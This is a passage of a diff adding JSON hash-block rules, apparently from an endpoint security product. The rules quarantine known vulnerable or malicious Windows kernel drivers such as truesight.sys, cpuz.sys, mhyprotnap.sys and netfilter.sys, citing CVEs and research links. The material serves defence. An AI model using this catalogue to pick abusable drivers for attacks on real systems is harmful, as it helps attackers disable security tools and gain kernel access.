+ "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983989Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e466e2bf4e190edd8717f6e8466b77a66b3304f5ae1458ca4400025a869fdfd1", + "comment": "Vulnerable Kernel Driver (aka LMIinfo.sys) [https://www.loldrivers.io/drivers/a02ee964-a21e-4b08-9c98-a730c90bfd53/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c8c0cbf0-2673-54b3-85a9-181c1d100d51", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823500Z", + "creation_date": "2026-03-23T11:45:31.823503Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823512Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6df12669f7e96e72ef5cbb3b8bd1dfc2d359a0023f3c9d216c5fbdb84a44c2ef", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c8ec34d0-4dc0-53f1-aa4c-9b9a93f89af8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622579Z", + "creation_date": "2026-03-23T11:45:29.622581Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622586Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"8939116df1d6c8fd0ebd14b2d37b3dec38a8820aa666ecd487bc1bb794f2a587", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c8f1ec12-08ea-577f-820f-ec3ecde62bc2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153424Z", + "creation_date": "2026-03-23T11:45:31.153427Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153436Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8908a5eea68b2671143bd4f5e87d941fbf037693b7bdf20a3fa10783d0061e5e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c8f64da6-f191-521d-ad8e-adfa0bee29ea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146911Z", + "creation_date": "2026-03-23T11:45:31.146913Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146918Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0d32183f339f98b5d4d3e6b729c75bb354d9220500fe93c4f169be22b1bde50a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c8fc34a8-268b-5af5-bdfa-3daf4597ceaa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.484302Z", + "creation_date": "2026-03-23T11:45:31.484305Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.484314Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c318bdbf026513af53c16b81e77e1bb37c98b78e1b78d23f1abb6257c60ad29", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c8fef551-ae86-5821-8a81-294147a66fd1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474118Z", + "creation_date": "2026-03-23T11:45:30.474122Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474130Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b32ef857f7603af679fb794432c9c1ecab0ca7a0ac2ae4dd4fd5e80e05d8bb30", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c901489a-86a3-5c9f-8563-524806a96cbe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967746Z", + "creation_date": "2026-03-23T11:45:29.967748Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967753Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "55881408b405194f63c04de52b1701d964f942ac191ed1fc2e572159e7e94476", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c908ac86-caa8-5135-80a2-0e3f2bbe39b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981995Z", + "creation_date": "2026-03-23T11:45:29.981997Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982003Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bd243e33fa80f4bd6010c23ecdf94b6008fee30df248255dcfe014c91f2ce2af", + "comment": "Malicious Kernel Driver (aka wantd_6.sys) [https://www.loldrivers.io/drivers/127cde1d-905e-4c67-a2c3-04ea4deaea7d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c919dafb-bf72-5844-b498-5993d9ca714f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, 
+ "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825751Z", + "creation_date": "2026-03-23T11:45:31.825753Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825758Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d4f002bfa2eca3bd8f1940c4f8dcefe4db1934d50bd8612eafe6244b1fff9884", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c924f8df-5475-58cd-a569-1ee79a407ba9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475387Z", + "creation_date": "2026-03-23T11:45:30.475390Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475400Z", + "rule_level": null, + "rule_level_override": 
null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "40263b08b3c3659529ab605d1daa3033db0fdc4b19c26aa375be0c19686807e6", + "comment": "Vulnerable Kernel Driver (aka mhyprotnap.sys) [https://www.loldrivers.io/drivers/75a66604-f024-4f11-8ba7-fdd64a0df3bf/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9547e16-86aa-560f-bd9f-1fecc37c2810", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487576Z", + "creation_date": "2026-03-23T11:45:31.487578Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487583Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "74a3e72507f758e4d2eca2462db3a24e59d6cec48d7f9600b9f40c09a385d395", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c95bd541-e9c1-5dee-bbc4-c1c2e720ab6f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473281Z", + "creation_date": "2026-03-23T11:45:30.473284Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473293Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b8ffe83919afc08a430c017a98e6ace3d9cbd7258c16c09c4f3a4e06746fc80a", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c95c795d-cc4e-56f3-851b-de98a8abc372", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618659Z", + "creation_date": "2026-03-23T11:45:29.618661Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618667Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c2f5db10a59577aeff8550a58f9d96ce8aa8c1a13f96814cd0f4bb03274968e9", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) 
[CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c964705f-238e-53ef-a9bc-bcc741943241", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819390Z", + "creation_date": "2026-03-23T11:45:31.819394Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819402Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "82fead4660edf201ea2af810fe6e1df22636c736b5165575b5f4a6ad5a4a050d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c96bdbfb-02fe-5bfd-a6bd-8cef6855df6d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614334Z", + "creation_date": "2026-03-23T11:45:29.614336Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614341Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d8b58f6a89a7618558e37afc360cd772b6731e3ba367f8d58734ecee2244a530", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9738c1d-b259-59fd-9d8f-f32e49189254", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155770Z", + "creation_date": "2026-03-23T11:45:31.155772Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155778Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "887c3e1fb16b423a347fe8e9f46fd67ba7fab3f757d81c834cb26cc3ef7104cd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c97e7f4a-062d-550d-a4e8-ef0741e45ca4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818631Z", + "creation_date": "2026-03-23T11:45:30.818633Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818638Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e9919d1546c7dfef62ff01b87f739812de0a57463611c12012013ae689023ce1", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9815b78-1b4f-523b-bccc-81d635dd7a50", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835537Z", + "creation_date": "2026-03-23T11:45:30.835539Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835545Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ec22aea52bdb4195c2f898a8ad3604493bdc28497e7c5ad12a08bc92c8748461", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c990cedd-13f3-590f-9cae-1aaa570c12b9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146114Z", + "creation_date": "2026-03-23T11:45:31.146116Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146121Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c2a48a71d21867d3d1406a6d82c239b857f3c3c5598389869753ec911847d95a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c99eeea0-6fe0-5d5d-9030-941f3562a441", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821272Z", + "creation_date": "2026-03-23T11:45:30.821275Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821284Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a34e45e5bbec861e937aefb3cbb7c8818f72df2082029e43264c2b361424cbb1", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c99f9cb2-2b43-5bee-98d2-3deb3d30b994", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822836Z", + "creation_date": "2026-03-23T11:45:30.822838Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822843Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b3d1bdd4ad819b99870b6e2ed3527dfc0e3ce27b929ad64382b9c3d4e332315c", + "comment": "Vulnerable Kernel Driver (aka SBIOSIO64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9a96a76-d53d-59a3-82bd-8825a5601dbf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820668Z", + "creation_date": "2026-03-23T11:45:30.820670Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820675Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5aee1bae73d056960b3a2d2e24ea07c44358dc7bc3f8ac58cc015cccc8f8d89c", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9b0b0cf-05ab-5fa8-b972-c94d650a610b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + 
"id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827786Z", + "creation_date": "2026-03-23T11:45:30.827788Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827793Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5747b57c3bcd4ddcc84876b1c298e9ff8b6a91831217a1d0d6a1d73567f5aae1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c9b5dadc-7bbe-5443-9efe-3a22f1750015", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479862Z", + "creation_date": "2026-03-23T11:45:31.479866Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479893Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fb9c54dea38d847c00d0ec7195b5b8fe0326ae4922c6c84b1e4c29acc7507c16", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
